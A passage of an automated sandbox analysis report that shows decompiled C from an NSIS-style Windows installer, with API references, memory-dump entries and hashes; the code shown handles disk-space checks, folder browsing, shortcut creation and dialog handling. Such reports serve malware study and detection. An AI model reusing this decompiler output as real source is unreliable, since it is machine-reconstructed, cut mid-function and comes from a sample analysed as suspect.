						if(_a8 == 0x40f) {
							L21:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t145 = _t144 | 0xffffffff;
							E004052A3(0x3fb, _t151);
							if(E004055AC(_t169, _t151) == 0) {
								_v8 = 1;
							}
							E004059BF(0x79e550, _t151);
							_t80 = E0040555F(0x79e550);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
							if(_t81 == 0) {
								L28:
								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L31;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t145 = MulDiv(_t100, _v16, 0x400);
								goto L30;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x79e550);
								if( *_t81() == 0) {
									goto L28;
								}
								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L30:
								_v12 = 1;
								L31:
								if(_t145 < E004045FA(5)) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
									E00404545(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x79e540);
									} else {
										E00404545(0x400, 0xfffffffc, _t145);
									}
								}
								_t88 = _v8;
								 *0x7a3024 = _t88;
								if(_t88 == 0) {
									_v8 = E00401410(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403DC9(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x79f570 == 0) {
									E0040417A();
								}
								 *0x79f570 = 0;
								goto L45;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L45;
						}
						goto L21;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t140 = 7;
							memset( &_v72, 0, _t140 << 2);
							_t144 = 0x79f580;
							_v76 = _a4;
							_v68 = 0x79f580;
							_v56 = E004044DF;
							_v52 = _t151;
							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								E0040521C(0, _t110);
								E004054CC(_t151);
								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
								if(_t114 != 0) {
									_push(_t114);
									_push(0);
									E004059E1(0x3fb, 0x79f580, _t151);
									_t144 = 0x7a1f20;
									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
										lstrcatA(_t151, 0x7a1f20);
									}
								}
								 *0x79f570 =  *0x79f570 + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t151);
							}
						}
						goto L19;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L45;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t144 = GetDlgItem(_a4, 0x3fb);
					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
						E004054CC(_t151);
					}
					 *0x7a2758 = _a4;
					SetWindowTextA(_t144, _t151);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DA7(_a4);
					E00403DDC(_t144);
					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
					if(_t128 == 0) {
						L45:
						return E00403E0E(_a8, _a12, _a16);
					}
					 *_t128(_t144, 1);
					goto L8;
				}
			}




































                                                                              0x004041eb
                                                                              0x004041f2
                                                                              0x004041fe
                                                                              0x0040420c
                                                                              0x00404214
                                                                              0x00404218
                                                                              0x0040421e
                                                                              0x0040421e
                                                                              0x0040422a
                                                                              0x004042a4
                                                                              0x004042ab
                                                                              0x00404377
                                                                              0x0040437e
                                                                              0x0040438d
                                                                              0x0040438d
                                                                              0x00404391
                                                                              0x00404397
                                                                              0x0040439a
                                                                              0x004043a7
                                                                              0x004043a9
                                                                              0x004043a9
                                                                              0x004043b7
                                                                              0x004043bd
                                                                              0x004043c4
                                                                              0x004043c6
                                                                              0x004043c6
                                                                              0x004043d3
                                                                              0x004043df
                                                                              0x00404403
                                                                              0x00404414
                                                                              0x0040441a
                                                                              0x0040441c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00404422
                                                                              0x00404422
                                                                              0x00404430
                                                                              0x00000000
                                                                              0x004043e1
                                                                              0x004043e4
                                                                              0x004043e8
                                                                              0x004043ec
                                                                              0x004043ed
                                                                              0x004043f2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004043fa
                                                                              0x00404432
                                                                              0x00404432
                                                                              0x00404439
                                                                              0x00404442
                                                                              0x00404444
                                                                              0x00404444
                                                                              0x00404456
                                                                              0x00404460
                                                                              0x00404468
                                                                              0x0040447e
                                                                              0x0040446a
                                                                              0x0040446e
                                                                              0x0040446e
                                                                              0x00404468
                                                                              0x00404483
                                                                              0x00404488
                                                                              0x0040448d
                                                                              0x00404496
                                                                              0x00404496
                                                                              0x0040449f
                                                                              0x004044a1
                                                                              0x004044a1
                                                                              0x004044ad
                                                                              0x004044b5
                                                                              0x004044bf
                                                                              0x004044bf
                                                                              0x004044c4
                                                                              0x00000000
                                                                              0x004044c4
                                                                              0x004043df
                                                                              0x00404380
                                                                              0x00404387
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00404387
                                                                              0x004042b1
                                                                              0x004042b7
                                                                              0x004042d1
                                                                              0x004042d6
                                                                              0x004042e0
                                                                              0x004042e7
                                                                              0x004042ec
                                                                              0x004042f6
                                                                              0x004042f9
                                                                              0x004042fc
                                                                              0x00404303
                                                                              0x0040430b
                                                                              0x0040430e
                                                                              0x00404312
                                                                              0x00404319
                                                                              0x00404321
                                                                              0x00404370
                                                                              0x00404323
                                                                              0x00404324
                                                                              0x0040432a
                                                                              0x00404334
                                                                              0x0040433c
                                                                              0x0040433e
                                                                              0x0040433f
                                                                              0x00404341
                                                                              0x00404347
                                                                              0x00404355
                                                                              0x00404359
                                                                              0x00404359
                                                                              0x00404355
                                                                              0x0040435e
                                                                              0x00404369
                                                                              0x00404369
                                                                              0x00404321
                                                                              0x00000000
                                                                              0x004042d6
                                                                              0x004042c4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004042ca
                                                                              0x00000000
                                                                              0x0040422c
                                                                              0x00404237
                                                                              0x00404240
                                                                              0x0040424d
                                                                              0x0040424d
                                                                              0x00404257
                                                                              0x0040425c
                                                                              0x00404265
                                                                              0x00404268
                                                                              0x0040426d
                                                                              0x00404275
                                                                              0x00404278
                                                                              0x0040427d
                                                                              0x00404283
                                                                              0x00404292
                                                                              0x00404299
                                                                              0x004044ca
                                                                              0x004044dc
                                                                              0x004044dc
                                                                              0x004042a2
                                                                              0x00000000
                                                                              0x004042a2

                                                                              APIs
                                                                              • GetDlgItem.USER32 ref: 00404230
                                                                              • SetWindowTextA.USER32(00000000,?), ref: 0040425C
                                                                              • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
                                                                              • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
                                                                              • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
                                                                              • SetDlgItemTextA.USER32 ref: 00404369
                                                                                • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
                                                                                • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                                • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                                • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                                • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                              • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
                                                                              • SetDlgItemTextA.USER32 ref: 0040447E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                                                              • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
                                                                              • API String ID: 2007447535-1909522251
                                                                              • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                              • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
                                                                              • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                              • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004020A6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 74%
                                                                              			E004020A6(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
				_t96 = E00402A9A(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
				if(E00405538(_t96) == 0) {
					E00402A9A(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							 *0x409418 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                              0x004020af
                                                                              0x004020b9
                                                                              0x004020c2
                                                                              0x004020cc
                                                                              0x004020d5
                                                                              0x004020df
                                                                              0x004020e3
                                                                              0x004020e3
                                                                              0x004020e8
                                                                              0x004020f9
                                                                              0x00402101
                                                                              0x004021df
                                                                              0x004021df
                                                                              0x004021e6
                                                                              0x00402107
                                                                              0x00402107
                                                                              0x00402118
                                                                              0x0040211c
                                                                              0x00402122
                                                                              0x0040212c
                                                                              0x0040212e
                                                                              0x00402139
                                                                              0x0040213c
                                                                              0x00402149
                                                                              0x0040214b
                                                                              0x0040214d
                                                                              0x00402154
                                                                              0x00402157
                                                                              0x00402157
                                                                              0x0040215a
                                                                              0x00402164
                                                                              0x0040216c
                                                                              0x00402171
                                                                              0x0040217d
                                                                              0x0040217d
                                                                              0x00402180
                                                                              0x00402189
                                                                              0x0040218c
                                                                              0x00402195
                                                                              0x0040219a
                                                                              0x004021ac
                                                                              0x004021b5
                                                                              0x004021bb
                                                                              0x004021c7
                                                                              0x004021c7
                                                                              0x004021c9
                                                                              0x004021cf
                                                                              0x004021cf
                                                                              0x004021d2
                                                                              0x004021d8
                                                                              0x004021dd
                                                                              0x004021f2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004021dd
                                                                              0x004021e8
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                              • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                              • API String ID: 123533781-501415292
                                                                              • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                              • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
                                                                              • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                              • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004026BC, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 39%
                                                                              			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
					E0040591D(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E004059BF();
				} else {
					 *((char*)(__edi)) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                              0x004026d4
                                                                              0x004026e8
                                                                              0x004026f3
                                                                              0x004026f4
                                                                              0x00402855
                                                                              0x004026d6
                                                                              0x004026d6
                                                                              0x004026d8
                                                                              0x004026da
                                                                              0x004026da
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID:
                                                                              • API String ID: 1974802433-0
                                                                              • Opcode ID: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                              • Instruction ID: fa0b3d5524a7ec5f3b356c4eb27d29c110ff1bfb4a1b37a6377ddf9626cce4e3
                                                                              • Opcode Fuzzy Hash: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                              • Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02631868, Relevance: .0, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220733017.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                              • Instruction ID: f3ddf26521c7d631aca515626703cbbf433a77b4270aee5633081a660c2cc90b
                                                                              • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                              • Instruction Fuzzy Hash: F0010C78A11208EFCB91DF98C5809ADBBF5EB09320F1585D5E818E7711E330AE509B44
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02631650, Relevance: .0, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220733017.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                              • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                              • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                              • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004038BF, Relevance: 46.8, APIs: 31, Instructions: 347windowstringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 77%
                                                                              			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t35;
				struct HWND__* _t37;
				struct HWND__* _t47;
				struct HWND__* _t65;
				struct HWND__* _t71;
				struct HWND__* _t84;
				struct HWND__* _t89;
				struct HWND__* _t97;
				int _t101;
				int _t104;
				struct HWND__* _t117;
				struct HWND__* _t120;
				signed int _t122;
				struct HWND__* _t127;
				long _t132;
				int _t134;
				int _t135;
				struct HWND__* _t136;
				void* _t139;

				_t135 = _a8;
				if(_t135 == 0x110 || _t135 == 0x408) {
					_t33 = _a12;
					_t117 = _a4;
					__eflags = _t135 - 0x110;
					 *0x79f56c = _t33;
					if(_t135 == 0x110) {
						 *0x7a2f84 = _t117;
						 *0x79f57c = GetDlgItem(_t117, 1);
						_t89 = GetDlgItem(_t117, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79e548 = _t89;
						E00403DA7(_t117);
						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
						 *0x7a274c = E00401410(4);
						_t33 = 1;
						__eflags = 1;
						 *0x79f56c = 1;
					}
					_t120 =  *0x409284; // 0xffffffff
					_t132 = (_t120 << 6) +  *0x7a2fa0;
					__eflags = _t120;
					if(_t120 < 0) {
						L38:
						E00403DF3(0x40b);
						while(1) {
							_t35 =  *0x79f56c;
							 *0x409284 =  *0x409284 + _t35;
							_t132 = _t132 + (_t35 << 6);
							_t37 =  *0x409284; // 0xffffffff
							__eflags = _t37 -  *0x7a2fa4;
							if(_t37 ==  *0x7a2fa4) {
								E00401410(1);
							}
							__eflags =  *0x7a274c;
							if( *0x7a274c != 0) {
								break;
							}
							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t132 + 0x24)));
							_t122 =  *(_t132 + 0x14);
							_push(0x7ab000);
							E004059E1(_t117, _t122, _t132);
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E00403DA7(_t117);
							_t47 = GetDlgItem(_t117, 3);
							__eflags =  *0x7a300c;
							_t136 = _t47;
							if( *0x7a300c != 0) {
								_t122 = _t122 & 0x0000fefd | 0x00000004;
								__eflags = _t122;
							}
							ShowWindow(_t136, _t122 & 0x00000008);
							EnableWindow(_t136, _t122 & 0x00000100);
							E00403DC9(_t122 & 0x00000002);
							EnableWindow( *0x79e548, _t122 & 0x00000004);
							SendMessageA(_t136, 0xf4, 0, 1);
							__eflags =  *0x7a300c;
							if( *0x7a300c == 0) {
								_push( *0x79f57c);
							} else {
								SendMessageA(_t117, 0x401, 2, 0);
								_push( *0x79e548);
							}
							E00403DDC();
							E004059BF(0x79f580, 0x7a2780);
							_push( *((intOrPtr*)(_t132 + 0x18)));
							_push( &(0x79f580[lstrlenA(0x79f580)]));
							E004059E1(_t117, 0, _t132);
							SetWindowTextA(_t117, 0x79f580);
							_push(0);
							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t65;
								if( *_t132 == _t65) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x7a2758);
									 *0x79ed58 = _t132;
									__eflags =  *_t132;
									if( *_t132 > 0) {
										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
										__eflags = _t71;
										 *0x7a2758 = _t71;
										if(_t71 != 0) {
											_push( *((intOrPtr*)(_t132 + 0x2c)));
											_push(6);
											E00403DA7(_t71);
											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
											ScreenToClient(_t117, _t139 + 0x10);
											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
											_push(0);
											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
											ShowWindow( *0x7a2758, 8);
											E00403DF3(0x405);
										}
									}
									goto L58;
								}
								__eflags =  *0x7a300c - _t65;
								if( *0x7a300c != _t65) {
									goto L61;
								}
								__eflags =  *0x7a3000 - _t65;
								if( *0x7a3000 != _t65) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a2758);
						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
						__eflags =  *0x7a2f84;
						EndDialog(_t117,  *0x79e950);
						goto L58;
					} else {
						__eflags = _t33 - 1;
						if(_t33 != 1) {
							L37:
							__eflags =  *_t132;
							if( *_t132 == 0) {
								goto L61;
							}
							goto L38;
						}
						_push(0);
						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L37;
						}
						SendMessageA( *0x7a2758, 0x40f, 0, 1);
						__eflags =  *0x7a274c;
						return 0 |  *0x7a274c == 0x00000000;
					}
				} else {
					_t117 = _a4;
					if(_t135 == 0x47) {
						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
					}
					if(_t135 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
					}
					if(_t135 != 0x40d) {
						__eflags = _t135 - 0x11;
						if(_t135 != 0x11) {
							__eflags = _t135 - 0x10;
							if(_t135 != 0x10) {
								L14:
								__eflags = _t135 - 0x111;
								if(_t135 != 0x111) {
									L30:
									return E00403E0E(_t135, _a12, _a16);
								}
								_t134 = _a12 & 0x0000ffff;
								_t127 = GetDlgItem(_t117, _t134);
								__eflags = _t127;
								if(_t127 == 0) {
									L17:
									__eflags = _t134 - 1;
									if(_t134 != 1) {
										__eflags = _t134 - 3;
										if(_t134 != 3) {
											__eflags = _t134 - 2;
											if(_t134 != 2) {
												L29:
												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
												goto L30;
											}
											__eflags =  *0x7a300c;
											if( *0x7a300c == 0) {
												_t97 = E00401410(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L30;
												}
												 *0x79e950 = 1;
												L25:
												_push(0x78);
												L26:
												E00403D80();
												goto L30;
											}
											E00401410(_t134);
											 *0x79e950 = _t134;
											goto L25;
										}
										__eflags =  *0x409284;
										if( *0x409284 <= 0) {
											goto L29;
										}
										_push(0xffffffff);
										goto L26;
									}
									_push(1);
									goto L26;
								}
								SendMessageA(_t127, 0xf3, 0, 0);
								_t101 = IsWindowEnabled(_t127);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L61;
								}
								goto L17;
							}
							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
							if(__eflags != 0) {
								goto L30;
							}
							_t104 = IsWindowEnabled( *0x79e548);
							__eflags = _t104;
							if(_t104 != 0) {
								goto L30;
